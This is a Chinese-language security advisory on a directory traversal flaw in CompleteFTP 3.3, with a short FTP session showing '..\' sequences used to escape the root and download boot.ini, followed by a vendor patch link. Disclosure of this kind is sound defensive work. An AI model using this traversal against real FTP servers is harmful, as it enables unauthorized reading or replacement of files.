发布日期：2010-04-29
更新日期：2010-04-30

受影响系统：

Enterprise Distributed Technologies CompleteFTP 3.3

不受影响系统：

Enterprise Distributed Technologies CompleteFTP 4.0

描述：

---

BUGTRAQ  ID: 39802

CompleteFTP是高性能的Windows平台FTP服务器。

远程攻击者可以通过向CompleteFTP服务器提交恶意FTP命令执行目录遍历攻击，导致下载或替换FTP根目录外的任意文件。

<*来源：zombiefx
  
  链接：http://secunia.com/advisories/39191/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

230 User test logged in.  

ftp> pwd  

257 "/Home/test" is current directory.  

ftp> cd ..\..\..\..\..\..\..\..\  

250 Directory changed to "/Home/test/..\..\..\..\..\..\..\..\".  

ftp> get boot.ini  

200 PORT command successful.  

150 Opening ASCII mode data connection for boot.ini  

226 Transfer complete.  

ftp: 215 bytes received in 0.14Seconds 1.54Kbytes/sec.

建议：

---

厂商补丁：

Enterprise Distributed Technologies
-----------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.enterprisedt.com/products/completeftp/

浏览次数：3086
严重程度：0（网友投票）